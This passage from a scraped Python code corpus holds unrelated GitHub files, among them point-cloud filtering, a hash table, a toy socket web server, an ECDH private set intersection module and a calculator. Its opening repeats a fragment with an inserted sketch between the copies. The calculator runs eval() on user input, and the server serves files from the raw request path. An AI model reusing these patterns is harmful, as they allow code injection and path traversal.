position information\n        (or None for the latter if filtered_elt_pos is set to False\n        or if the cloud DataFrame has not been built with the with_coords option)\n    """\n    if filtered_elt_pos and not (\n        cst.POINTS_CLOUD_COORD_EPI_GEOM_I in cloud.columns\n        and cst.POINTS_CLOUD_COORD_EPI_GEOM_J in cloud.columns\n        and cst.POINTS_CLOUD_IDX_IM_EPI in cloud.columns\n    ):\n        worker_logger = logging.getLogger("distributed.worker")\n        worker_logger.warning(\n            "In filter_cloud: the filtered_elt_pos has been activated but "\n            "the cloud DataFrame has not been built with option with_coords. "\n            "The positions cannot be retrieved."\n        )\n        filtered_elt_pos = False\n
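# [Illustrative sketch, not part of points_cloud.py] A standalone demo of the
# mean-kNN-distance outlier test implemented by detect_statistical_outliers
# above; the data values are invented, only numpy and scipy are assumed.
import numpy as np
from scipy.spatial import cKDTree

rng = np.random.default_rng(0)
pts = rng.normal(size=(200, 3))               # dense cluster of 200 points
pts = np.vstack([pts, [[25.0, 25.0, 25.0]]])  # one far-away outlier

k, std_factor = 10, 3.0
tree = cKDTree(pts)
dists, _ = tree.query(pts, k + 1)     # column 0 is each point itself (distance 0)
mean_d = dists.sum(axis=1) / k        # same trick as above: the self-distance adds 0
thresh = mean_d.mean() + std_factor * mean_d.std()
print(np.flatnonzero(mean_d > thresh))  # -> [200], the injected outlier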
\"\n \"The positions cannot be retrieved.\"\n )\n filtered_elt_pos = False\n\n # retrieve removed points position in their original epipolar images\n if filtered_elt_pos:\n labels = [\n cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n cst.POINTS_CLOUD_IDX_IM_EPI,\n ]\n\n removed_elt_pos_infos = cloud.loc[\n cloud.index.values[index_elt_to_remove], labels\n ].values\n\n removed_elt_pos_infos = pandas.DataFrame(\n removed_elt_pos_infos, columns=labels\n )\n else:\n removed_elt_pos_infos = None\n\n # remove points from the cloud\n cloud = cloud.drop(index=cloud.index.values[index_elt_to_remove])\n\n return cloud, removed_elt_pos_infos\n\n\ndef add_cloud_filtering_msk(\n clouds_list: List[xr.Dataset],\n elt_pos_infos: pandas.DataFrame,\n mask_label: str,\n mask_value: int = 255,\n):\n \"\"\"\n Add a uint16 mask labeled 'mask_label' to the clouds in clouds_list.\n (in-line function)\n\n :param clouds_list: Input list of clouds\n :param elt_pos_infos: pandas dataframe\n composed of cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J, cst.POINTS_CLOUD_IDX_IM_EPI columns\n as computed in the create_combined_cloud function.\n Those information are used to retrieve the point position\n in its original epipolar image.\n :param mask_label: label to give to the mask in the datasets\n :param mask_value: filtered elements value in the mask\n \"\"\"\n\n # Verify that the elt_pos_infos is consistent\n if (\n elt_pos_infos is None\n or cst.POINTS_CLOUD_COORD_EPI_GEOM_I not in elt_pos_infos.columns\n or cst.POINTS_CLOUD_COORD_EPI_GEOM_J not in elt_pos_infos.columns\n or cst.POINTS_CLOUD_IDX_IM_EPI not in elt_pos_infos.columns\n ):\n worker_logger = logging.getLogger(\"distributed.worker\")\n worker_logger.warning(\n \"Cannot generate filtered elements mask, \"\n \"no information about the point's\"\n \" original position in the epipolar image is given\"\n )\n\n else:\n elt_index = elt_pos_infos.loc[:, cst.POINTS_CLOUD_IDX_IM_EPI].to_numpy()\n\n min_elt_index = np.min(elt_index)\n max_elt_index = np.max(elt_index)\n\n if min_elt_index < 0 or max_elt_index > len(clouds_list) - 1:\n raise Exception(\n \"Index indicated in the elt_pos_infos pandas. \"\n \"DataFrame is not coherent with the clouds list given in input\"\n )\n\n # create and add mask to each element of clouds_list\n for cloud_idx, cloud_item in enumerate(clouds_list):\n if mask_label not in cloud_item:\n nb_row = cloud_item.coords[cst.ROW].data.shape[0]\n nb_col = cloud_item.coords[cst.COL].data.shape[0]\n msk = np.zeros((nb_row, nb_col), dtype=np.uint16)\n else:\n msk = cloud_item[mask_label].values\n\n cur_elt_index = np.argwhere(elt_index == cloud_idx)\n\n for elt_pos in range(cur_elt_index.shape[0]):\n i = int(\n elt_pos_infos.loc[\n cur_elt_index[elt_pos],\n cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n ].iat[0]\n )\n j = int(\n elt_pos_infos.loc[\n cur_elt_index[elt_pos],\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n ].iat[0]\n )\n\n try:\n msk[i, j] = mask_value\n except Exception as index_error:\n raise Exception(\n \"Point at location ({},{}) is not accessible \"\n \"in an image of size ({},{})\".format(\n i, j, msk.shape[0], msk.shape[1]\n )\n ) from index_error\n\n cloud_item[mask_label] = ([cst.ROW, cst.COL], msk)\n","repo_name":"KalipheGTU/cars","sub_path":"cars/steps/points_cloud.py","file_name":"points_cloud.py","file_ext":"py","file_size_in_byte":26330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37038934123","text":"#! 
/usr/bin/env python3\r\n\r\n# Script to administrate RFAI database\r\n# last revision: Sep 2016, Michael Fruhnert\r\n\r\n## INSTRUCTIONS:\r\n## 1) use along with rfai.py and rfaitoolbox.py\r\n##\r\n## Path to Modify category: modify question - modify category\r\n\r\n#import all necessary libraries\r\nfrom openpyxl import load_workbook\r\nfrom os import system\r\nfrom rfaitoolbox import selectQuestionMaster, rearrangeCategories\r\nfrom rfaitoolbox import replaceQuestion, collectRFAI, normalizeMaster\r\nfrom rfaitoolbox import findRFAIFolder\r\nimport basicUtils as basics\r\n\r\ndoMore = True\r\nsystem('clear')\r\nrfaiFolder = findRFAIFolder(True) # assume that we work one at a time\r\nif (rfaiFolder[0] != ''):\r\n    print(rfaiFolder[1] + ' set as default.\\n')\r\n\r\nwhile(doMore):\r\n    print('This is the RFAI administration tool. ' \\\r\n          'Use with extreme caution!\\n')\r\n\r\n    doThis = input(\"Choose from options below:\\n\"\\\r\n                   \"c: re-arrange categories\\n\" \\\r\n                   \"q: modify questions / answers\\n\" \\\r\n                   \"n: normalize master (ASCII conformity)\\n\" \\\r\n                   \"r: replace question (mark for deletion)\\n\" \\\r\n                   \"w: collect files and write responses\\n\" \\\r\n                   \"0: exit\\n\" \\\r\n                   \"\\n\")\r\n    \r\n    system('clear')\r\n    if (doThis == 'c'):\r\n        rearrangeCategories()\r\n    elif (doThis == 'q'):\r\n        selectQuestionMaster()\r\n    elif (doThis == 'n'):\r\n        normalizeMaster()\r\n    elif (doThis == 'r'):\r\n        replaceQuestion(rfaiFolder[0])\r\n    elif (doThis == 'w'):\r\n        collectRFAI(rfaiFolder[0])\r\n    elif (doThis == '0'):\r\n        print(\"RFAI administration tool shut-down...\\n\")\r\n        doMore = False\r\n    else:\r\n        print(\"Invalid input. Enter 0 to exit.\\n\")\r\n","repo_name":"pickles72/RFAI","sub_path":"rfaiAdmin.py","file_name":"rfaiAdmin.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1929137473","text":"import pandas as pd\n\n# Read Excel file\ndf = pd.read_excel('./LabelledData_2/3.xlsx') # Set 2 Mike\n#df = pd.read_table('./LabelledData_3/4.xlsx') # Set 3 Joe\n\n\n# Print the first row\nfirst_row = df.head(n=1)\nprint(first_row)\n","repo_name":"tylermante10/NAIIDS","sub_path":"test-files/readCSVTest.py","file_name":"readCSVTest.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22023698400","text":"import socket\n\ndef start_my_server():\n    try: # exception handler\n        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        server.bind(('127.0.0.1', 2000)) # assign an address to the server socket\n\n        server.listen(4) # number of queued incoming connections\n        while True: # endless request-handling loop\n            print('Working...')\n            client_socket, address = server.accept()\n            data = client_socket.recv(1024).decode('utf-8') # decode the request into readable text\n            #print(data)\n            content = load_page_from_get_request(data) # build the response for the client\n            client_socket.send(content) # send the encoded headers and body\n            client_socket.shutdown(socket.SHUT_WR) # close the connection with the client\n    except KeyboardInterrupt:\n        server.close()\n        print('Shutdown this shit...')\n\ndef load_page_from_get_request(request_data): # handle the client's request\n    HDRS = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n' # response type, status, status code, encoding\n    HDRS_404 = 'HTTP/1.1 404 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n'\n    path = request_data.split(' ')[1] # parse the request line with split\n    response = ''\n    try:\n        
with open('views' + path, 'rb') as file: # read its contents directly as bytes\n            response = file.read()\n        return HDRS.encode('utf-8') + response\n    except FileNotFoundError:\n        return (HDRS_404 + 'Sorry, but there is no page..').encode('utf-8') # the file cannot be opened because it does not exist\n\nif __name__ == '__main__': #Ger\n    start_my_server()\n\n","repo_name":"Vdmitrofanova/Universe","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30236631594","text":"import unittest\n\n\nclass HashItem(object):\n    def __init__(self, key, value):\n        self.key = key\n        self.value = value\n\n    def __repr__(self):\n        return f\"{self.key}: {self.value}\"\n\n\nclass HashTable(object):\n    \"\"\"Implementation of a HashTable using chaining; that means that in each\n    array slot there is a list.\n    \"\"\"\n\n    SIZE = 1024\n\n    def __init__(self):\n        self._slots = [list() for _ in range(self.SIZE)]\n\n    def __getitem__(self, key):\n        return self.get(key)\n\n    def __setitem__(self, key, value):\n        self.set(key, value)\n\n    @classmethod\n    def _hash(cls, key):\n        \"\"\"Hashing of the key. I decided to use the builtin hash function.\n        I don't think I could think about something smarter and more efficient\n        (in a general case) than C-implemented hashing function.\n\n        To make sure that we end up with a value within our _slots size I added\n        modulo `self.SIZE`.\n\n        \"\"\"\n        return hash(key) % cls.SIZE\n\n    def set(self, key, value):\n        \"\"\"Sets the key with value. If the key already exists in the dict its\n        item is updated, otherwise it is added.\n\n        :param key: key\n        :type key: object\n        :param value: value\n        :type value: object\n\n        :Example:\n        >>> hash_table = HashTable()\n        >>> hash_table.set(\"It's dangerous to go alone...\", \"Take this!\")\n        >>> # The same functionality can be implemented with brackets:\n        >>> # hash_table[\"It's dangerous to go alone...\"] = \"Take this!\"\n        >>> hash_table[\"It's dangerous to go alone...\"]\n        \"Take this!\"\n        \"\"\"\n        new_item = HashItem(key, value)\n        index = self._hash(key)\n        for iter_item in self._slots[index]:\n            if iter_item.key == key:\n                iter_item.value = value\n                return\n        self._slots[index].append(new_item)\n\n    def get(self, key):\n        \"\"\"Gets the value of element saved with key.\n        If key is not in the HashTable raises KeyError.\n\n        :param key: key\n        :type key: object\n        :return: value\n        :rtype: object\n        :raises: KeyError\n\n        :Example:\n        >>> hash_table = HashTable()\n        >>> hash_table[\"It's dangerous to go alone...\"] = \"Take this!\"\n        >>> hash_table.get(\"It's dangerous to go alone...\")\n        >>> # The same functionality can be implemented with brackets:\n        >>> # hash_table[\"It's dangerous to go alone...\"]\n        \"Take this!\"\n        \"\"\"\n        index = self._hash(key)\n        for iter_item in self._slots[index]:\n            if iter_item.key == key:\n                return iter_item.value\n        raise KeyError(f\"{key} is not in the hash table.\")\n\n\nclass TestHashTable(unittest.TestCase):\n    def test_init(self):\n        hash_table = HashTable()\n        self.assertListEqual([list()] * 1024, hash_table._slots)\n\n    def test_hash(self):\n        \"\"\"I am not going to test builtin hash function. 
Just make sure it\n never exceeds `self.SIZE`.\n \"\"\"\n test_input = [1, 2, 1023, 1024, 231312]\n expected = [1, 2, 1023, 0, 912]\n actual = [HashTable._hash(i) for i in test_input]\n for e, a in zip(expected, actual):\n with self.subTest(e=e, a=a):\n self.assertEqual(e, a)\n\n def test_put_one_element(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n self.assertEqual(hash_table._slots[1][0].value, 'xyz')\n\n def test_put_update_element(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n hash_table.set(1, 'abc')\n with self.subTest():\n self.assertEqual('abc', hash_table._slots[1][0].value)\n with self.subTest():\n self.assertEqual(1, len(hash_table._slots[1]))\n\n def test_put_multiple_elements(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n hash_table.set(1025, 'abc')\n hash_table.set(2049, 'lol')\n actual = hash_table._slots[1]\n for e, a in zip(['xyz', 'abc', 'lol'], actual):\n with self.subTest(e=e, a=a.value):\n self.assertEqual(e, a.value)\n actual_len = len(hash_table._slots[1])\n expected_len = 3\n with self.subTest(e=expected_len, a=actual_len):\n self.assertEqual(expected_len, actual_len)\n\n def test_get_raises(self):\n hash_table = HashTable()\n with self.assertRaises(KeyError):\n _ = hash_table.get('xyz')\n\n def test_get_one_elem_in_slot(self):\n hash_table = HashTable()\n hash_table.set(1025, 'abc')\n self.assertEqual('abc', hash_table.get(1025))\n\n def test_get_multiple_elem_in_slot(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n hash_table.set(1025, 'abc')\n hash_table.set(2049, 'lol')\n self.assertEqual('abc', hash_table.get(1025))\n\n def test_brackets(self):\n hash_table = HashTable()\n hash_table['You only'] = 'test once'\n self.assertEqual('test once', hash_table['You only'])\n\n","repo_name":"maciekgroch/maciek_learns_algorithms","sub_path":"data_structures/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40061124865","text":"from odoo import fields, models\n\n\nclass AccountAccount(models.Model):\n _inherit = \"account.account\"\n\n debit = fields.Float(string=\"Debit\", compute=\"_compute_account_balance\")\n credit = fields.Float(string=\"Credit\", compute=\"_compute_account_balance\")\n balance = fields.Float(string=\"Balance\", compute=\"_compute_account_balance\")\n\n def _compute_account_balance(self):\n for rec in self:\n sql = \"\"\"\n SELECT SUM(COALESCE(debit,0)) debit, SUM(COALESCE(credit,0)) credit,\n SUM(COALESCE(debit,0)-COALESCE(credit,0)) balance\n FROM account_move_line aml,account_move am\n WHERE aml.move_id=am.id\n AND account_id=%s\n AND am.state='posted'\n \"\"\"\n self._cr.execute(sql, (rec.id,))\n r = self._cr.fetchone()\n rec.debit = r[0]\n rec.credit = r[1]\n rec.balance = r[2]\n","repo_name":"kwaku-pistis/github_actions","sub_path":"account_account_balance/models/account_account.py","file_name":"account_account.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18588041263","text":"class LinkedList:\n head = None\n\n def __init__(self, iterable=None):\n if iterable:\n for i in iterable:\n self.append(Node(i))\n\n def append(self, node):\n if self.head is None:\n self.head = node\n else:\n current = self.head\n while current.next:\n current = current.next\n current.next = node\n\n def prepend(self, node):\n if not self.head:\n self.head = 
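# [Illustrative sketch, not the module above] Collision chaining in brief:
# with SIZE = 1024 the keys 1 and 1025 hash to the same slot, so both items
# land in the same bucket list and lookup walks the chain comparing keys.
SIZE = 1024
slots = [[] for _ in range(SIZE)]

def put(key, value):
    bucket = slots[hash(key) % SIZE]
    for item in bucket:          # update in place if the key already exists
        if item[0] == key:
            item[1] = value
            return
    bucket.append([key, value])

put(1, 'xyz'); put(1025, 'abc')
print(hash(1) % SIZE == hash(1025) % SIZE)  # True: both land in slot 1
print(slots[1])                             # [[1, 'xyz'], [1025, 'abc']]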
node\n else:\n node.next = self.head\n self.head = node\n\n def print(self):\n current = self.head\n while current:\n print(current.value)\n current = current.next\n\n def to_list(self):\n as_list = list()\n current = self.head\n while current:\n as_list.append(current.value)\n current = current.next\n\n return as_list\n\n\nclass Node:\n value = None\n next = None\n\n def __init__(self, value):\n self.value = value\n\n\nif __name__ == '__main__':\n test1 = [1, 2, 3]\n\n ll = LinkedList(test1)\n\n ll.print()\n\n print(ll.to_list())\n\n\n prepend_test = [1, 2, 3, 4]\n\n ll = LinkedList()\n for i in prepend_test:\n ll.prepend(Node(i))\n\n assert ll.to_list() == list(reversed(prepend_test))\n","repo_name":"maddencs/cracking_code","sub_path":"section2/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22720857671","text":"import unittest\nimport sys\nfrom webullsdkcore.client import ApiClient\nfrom webullsdkcore.request import ApiRequest\n\nOPENAPI_ENDPOINT = \"\"\n\n\nclass TestApiClient(unittest.TestCase):\n\n def test_api(self):\n client = ApiClient(app_key=\"\", app_secret=\"\")\n client.set_stream_logger(stream=sys.stderr)\n request = ApiRequest(\"/market-data/streaming/token\", version=\"v1\")\n request.set_endpoint(OPENAPI_ENDPOINT)\n self.assertIsNone(request.get_headers().get('Accept-Encoding'))\n client.get_response(request)\n self.assertEqual(request.get_headers()['Accept-Encoding'], 'gzip')\n","repo_name":"webull-inc/openapi-python-sdk","sub_path":"webull-python-sdk-demos/tests/core/api/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"3837358910","text":"#coding=utf-8\n\"\"\"\n@Author: Freshield\n@Contact: yangyufresh@163.com\n@File: b2_smooth.py\n@Time: 2019-12-27 09:38\n@Last_update: 2019-12-27 09:38\n@Desc: None\n@==============================================@\n@ _____ _ _ _ _ @\n@ | __|___ ___ ___| |_|_|___| |_| | @\n@ | __| _| -_|_ -| | | -_| | . 
| @\n@  |__|  |_|  |___|___|_|_|_|___|_|___|     @\n@                 Freshield                    @\n@==============================================@\n\"\"\"\nimport math\nimport numpy as np\n\n\ndef smooth(img_data, sigma=1.4, return_int=True):\n    \"\"\"\n    Build a (2k+1)x(2k+1) Gaussian filter (here k=2, i.e. a 5x5 kernel).\n    With 1-indexed i, j:\n    H[i, j] = (1/(2*pi*sigma**2)) * exp(-1/(2*sigma**2) * ((i-k-1)**2 + (j-k-1)**2))\n    \"\"\"\n    gau_sum = 0\n    gaussian = np.zeros((5, 5))\n    for i in range(5):\n        for j in range(5):\n            left = 1 / (2 * math.pi * sigma**2)\n            # with 0-indexed i, j the kernel must be centered at (2, 2)\n            right = math.exp((-1/(2*sigma**2)) * ((i-2)**2+(j-2)**2))\n            gaussian[i, j] = left * right\n            gau_sum += gaussian[i, j]\n\n    gaussian = gaussian / gau_sum\n\n    # filtering\n    W, H = img_data.shape\n    # a valid 5x5 convolution of a WxH image yields a (W-4)x(H-4) result\n    new_gray = np.zeros((W-4, H-4))\n\n    for i in range(W-4):\n        for j in range(H-4):\n            new_gray[i, j] = np.sum(img_data[i:i+5, j:j+5] * gaussian)\n\n    if return_int:\n        new_gray = new_gray.astype(np.uint8)\n\n    return new_gray\n\n\nif __name__ == '__main__':\n    import cv2\n    from b0_get_img_data import get_img_data\n    from b1_gray import gray\n\n    img_path = 'data/test.jpg'\n    img_data = get_img_data(img_path)\n    img_data = gray(img_data)\n    img_data = smooth(img_data)\n\n    img_data = img_data.astype(np.uint8)\n    cv2.imshow('test', img_data)\n    cv2.waitKey()","repo_name":"Freshield/Personal_Interest","sub_path":"a16_learn_canny/b2_smooth.py","file_name":"b2_smooth.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
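# [Illustrative sketch, not part of b2_smooth.py] The same 5x5 Gaussian kernel
# built vectorised, with a properly centred (i-2, j-2) offset grid; it sums to
# 1 after normalisation, with the peak at kernel[2, 2].
import math
import numpy as np

sigma = 1.4
ax = np.arange(5) - 2                        # offsets -2..2 around the centre
xx, yy = np.meshgrid(ax, ax)
kernel = np.exp(-(xx**2 + yy**2) / (2 * sigma**2)) / (2 * math.pi * sigma**2)
kernel /= kernel.sum()                       # normalise, as smooth() does
print(round(kernel.sum(), 6), kernel[2, 2] == kernel.max())  # 1.0 True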
+{"seq_id":"26901453875","text":"from federatedml.statistic.intersect.ecdh_intersect.ecdh_intersect_base import EcdhIntersect\nfrom federatedml.util import consts, LOGGER\n\n\nclass EcdhIntersectionGuest(EcdhIntersect):\n    def __init__(self):\n        super().__init__()\n        self.role = consts.GUEST\n        self.id_local_first = None\n        self.id_remote_second = None\n        self.id_local_second = None\n        self.host_count = None\n\n    def _exchange_id(self, id_cipher, replace_val=True):\n        if replace_val:\n            id_cipher = id_cipher.mapValues(lambda v: None)\n        self.transfer_variable.id_ciphertext_exchange_g2h.remote(id_cipher,\n                                                                 role=consts.HOST,\n                                                                 idx=-1)\n        LOGGER.info(f\"sent id 1st ciphertext to all host\")\n\n        id_list_remote = self.transfer_variable.id_ciphertext_exchange_h2g.get(idx=-1)\n        LOGGER.info(\"got id ciphertext from all host\")\n        return id_list_remote\n\n    def _sync_doubly_encrypted_id(self, id=None):\n        id_guest = self.transfer_variable.doubly_encrypted_id.get(idx=-1)\n        LOGGER.info(\"got doubly encrypted id list from host\")\n        return id_guest\n\n    \"\"\"\n    def send_intersect_ids(self, intersect_ids):\n        remote_intersect_id = intersect_ids.map(lambda k, v: (v, None))\n        self.transfer_variable.intersect_ids.remote(remote_intersect_id,\n                                                    role=consts.HOST,\n                                                    idx=0)\n        LOGGER.info(f\"Remote intersect ids to Host!\")\n    \"\"\"\n\n    def send_intersect_ids(self, intersect_ids):\n        for i, host_party_id in enumerate(self.host_party_id_list):\n            remote_intersect_id = intersect_ids.map(lambda k, v: (v[i], None))\n            self.transfer_variable.intersect_ids.remote(remote_intersect_id,\n                                                        role=consts.HOST,\n                                                        idx=i)\n            LOGGER.info(f\"Remote intersect ids to {i}th Host {host_party_id}!\")\n\n    def get_intersect_doubly_encrypted_id(self, data_instances, keep_key=True):\n        self.init_curve()\n        LOGGER.info(f\"curve instance obtained\")\n\n        # 1st ID encrypt: # (Eg, -1)\n        self.id_local_first = self._encrypt_id(data_instances,\n                                               self.curve_instance,\n                                               reserve_original_key=keep_key,\n                                               hash_operator=self.hash_operator,\n                                               salt=self.salt)\n        LOGGER.info(\"encrypted guest id for the 1st time\")\n        id_list_remote_first = self._exchange_id(self.id_local_first, keep_key)\n\n        # 2nd ID encrypt & receive doubly encrypted ID list: # (EEh, Eh)\n        self.id_list_remote_second = [self._sign_id(id_remote_first,\n                                                    self.curve_instance,\n                                                    reserve_original_key=keep_key)\n                                      for id_remote_first in id_list_remote_first]\n        LOGGER.info(\"encrypted remote id for the 2nd time\")\n\n        # receive doubly encrypted ID list from all host:\n        self.id_list_local_second = self._sync_doubly_encrypted_id()  # get (EEg, Eg)\n\n        # find intersection per host: (EEi, [Eg, Eh])\n        id_list_intersect_cipher_cipher = [self.extract_intersect_ids(remote_cipher,\n                                                                      local_cipher,\n                                                                      keep_both=keep_key)\n                                           for remote_cipher, local_cipher in zip(self.id_list_remote_second,\n                                                                                  self.id_list_local_second)]\n        LOGGER.info(\"encrypted intersection ids found\")\n\n        return id_list_intersect_cipher_cipher\n\n    def decrypt_intersect_doubly_encrypted_id(self, id_intersect_cipher_cipher):\n        # EEi -> (Eg, Eh)\n        id_list_intersect_cipher = [ids.map(lambda k, v: (v[1], [v[0]])) for ids in id_intersect_cipher_cipher]\n        intersect_ids = self.get_common_intersection(id_list_intersect_cipher, keep_encrypt_ids=True)\n        LOGGER.info(f\"intersection found\")\n\n        if self.sync_intersect_ids:\n            self.send_intersect_ids(intersect_ids)\n        else:\n            LOGGER.info(\"Skip sync intersect ids with Host(s).\")\n        intersect_ids = intersect_ids.join(self.id_local_first, lambda cipher, raw: raw)\n        intersect_ids = intersect_ids.map(lambda k, v: (v, None))\n        return intersect_ids\n\n    def get_intersect_key(self, party_id):\n        intersect_key = {\"curve_key\": self.curve_instance.get_curve_key().decode(\"latin1\")}\n        return intersect_key\n\n    def load_intersect_key(self, cache_meta):\n        host_party = self.host_party_id_list[0]\n        intersect_key = cache_meta[str(host_party)][\"intersect_key\"]\n        for host_party in self.host_party_id_list:\n            cur_intersect_key = cache_meta[str(host_party)][\"intersect_key\"]\n            # compare each host's key against the first host's key\n            if intersect_key != cur_intersect_key:\n                raise ValueError(f\"Not all intersect keys from cache match, please check.\")\n\n        curve_key = intersect_key[\"curve_key\"].encode(\"latin1\")\n        self.init_curve(curve_key)\n\n    def generate_cache(self, data_instances):\n        self.init_curve()\n        LOGGER.info(f\"curve instance obtained\")\n\n        cache_id_list = self.cache_transfer_variable.get(idx=-1)\n        LOGGER.info(f\"got cache_id from all host\")\n\n        id_list_remote_first = self.transfer_variable.id_ciphertext_exchange_h2g.get(idx=-1)\n        LOGGER.info(\"Get id ciphertext list from all host\")\n\n        # 2nd ID encrypt & receive doubly encrypted ID list: # (EEh, Eh)\n        id_remote_second = [self._sign_id(id_remote_first,\n                                          self.curve_instance,\n                                          reserve_original_key=True)\n                            for id_remote_first in id_list_remote_first]\n        LOGGER.info(\"encrypted remote id for the 2nd time\")\n\n        cache_data, cache_meta = {}, {}\n        intersect_meta = self.get_intersect_method_meta()\n        for i, party_id in enumerate(self.host_party_id_list):\n            meta = {\"cache_id\": cache_id_list[i],\n                    \"intersect_meta\": intersect_meta,\n                    \"intersect_key\": self.get_intersect_key(party_id)}\n            cache_meta[party_id] = meta\n            cache_data[party_id] = id_remote_second[i]\n\n        return cache_data, cache_meta\n\n    def get_intersect_doubly_encrypted_id_from_cache(self, data_instances, cache_data):\n        self.id_local_first = self._encrypt_id(data_instances,\n                                               self.curve_instance,\n                                               reserve_original_key=True,\n                                               hash_operator=self.hash_operator,\n                                               salt=self.salt)\n        LOGGER.info(\"encrypted guest id for the 1st time\")\n\n        id_only = self.id_local_first.mapValues(lambda v: None)\n        
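# [Illustrative sketch, NOT FATE's implementation] The protocol above relies on
# a commutative cipher: E_a(E_b(id)) == E_b(E_a(id)), so doubly-encrypted IDs
# can be intersected without revealing the raw IDs. A toy stand-in using
# modular exponentiation (ECDH uses elliptic-curve scalar multiplication);
# the modulus and keys below are invented and not cryptographically vetted.
p = 2**127 - 1                       # a Mersenne prime, toy modulus only
a, b = 987654321, 123456789          # guest / host secret keys (toy values)

def enc(x, key):
    return pow(x, key, p)

guest_ids = {11, 22, 33}
host_ids = {22, 33, 44}
double_g = {enc(enc(x, a), b) for x in guest_ids}   # E_b(E_a(id))
double_h = {enc(enc(x, b), a) for x in host_ids}    # E_a(E_b(id)), same values
print(len(double_g & double_h))  # 2 shared IDs found without exchanging raw IDs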
self.transfer_variable.id_ciphertext_exchange_g2h.remote(id_only,\n role=consts.HOST,\n idx=-1)\n LOGGER.info(f\"sent id 1st ciphertext to host\")\n\n # receive doubly encrypted ID from all hosts:\n self.id_list_local_second = self._sync_doubly_encrypted_id() # get (EEg, Eg)\n self.host_count = len(self.id_list_local_second)\n\n # find intersection: (EEi, [Eg, Eh])\n cache_host_list = self.extract_cache_list(cache_data, self.host_party_id_list)\n id_list_intersect_cipher_cipher = [self.extract_intersect_ids(cache_host_list[i],\n self.id_list_local_second[i],\n keep_both=True)\n for i in range(self.host_count)]\n LOGGER.info(\"encrypted intersection ids found\")\n self.id_remote_second = cache_host_list\n\n return id_list_intersect_cipher_cipher\n\n def run_cardinality(self, data_instances):\n LOGGER.info(f\"run cardinality_only with ECDH\")\n # EEg, Eg\n id_list_intersect_cipher_cipher = self.get_intersect_doubly_encrypted_id(data_instances,\n keep_key=False)\n # Eg\n id_intersect_cipher_cipher = self.filter_intersect_ids(id_list_intersect_cipher_cipher)\n self.intersect_num = id_intersect_cipher_cipher.count()\n if self.sync_cardinality:\n self.transfer_variable.cardinality.remote(self.intersect_num, role=consts.HOST, idx=-1)\n LOGGER.info(\"Sent intersect cardinality to host.\")\n else:\n LOGGER.info(\"Skip sync intersect cardinality with host\")\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/statistic/intersect/ecdh_intersect/ecdh_intersect_guest.py","file_name":"ecdh_intersect_guest.py","file_ext":"py","file_size_in_byte":9149,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"39445873554","text":"# Basic Calculator #\n# =============== #\n\n# ----- Importing Libraries ----- #\n\nimport re\n\n# ----- Welcome Message ----- #\n\nprint(\"\\n\", \"The Magical Calculator\", \"\\n\", \"======================\\n\")\nprint(\" Type 'quit' to exit.... 
\\n\\n\")\n\n# ------ Start of Program ----- #\n\nprevious = 0\nrun = True\n\n\ndef PerformMath():\n global run\n global previous\n equation = \"\"\n if previous == 0:\n equation = input(\" Enter Your Equation: \")\n else:\n equation = input(str(previous))\n if equation == \"quit\":\n print(\" Have a good day :)\")\n run = False\n else:\n equation = re.sub(\"[a-zA-Z,.%()\" \"]\", \"\", equation)\n\n if previous == 0:\n previous = eval(equation)\n else:\n previous = eval(str(previous) + equation)\n print(\" Result: \", previous)\n\n\nwhile run:\n PerformMath()\n\n\n# ------ End of Program ----- #\n","repo_name":"quantumudit/Python-Projects","sub_path":"04_Basic_Calculator/basic_calculator.py","file_name":"basic_calculator.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12159740089","text":"from fastapi import Depends\nfrom dependency_injector.wiring import Provide\nfrom datetime import datetime, timedelta\nimport json\nfrom api.containers import Container\nfrom api.services import Service\nfrom api.config import DATETIME_FORMAT\nfrom api.utils.errors import ErrorMessage\nfrom api.utils.messages import GetMessage, messages\nfrom api.utils.parce import GetPage\nfrom api.utils.time import last_updated_timedelta_to_text\n\n\nasync def GetChacheRequest(key, function=GetPage, service: Service = Depends(Provide[Container.service]), post_processing_function=None, chache_hours=5, **kwargs):\n cache_data = await service.GetCache(key)\n async def items_result(items):\n if post_processing_function:\n return await post_processing_function(items)\n return items\n if cache_data:\n 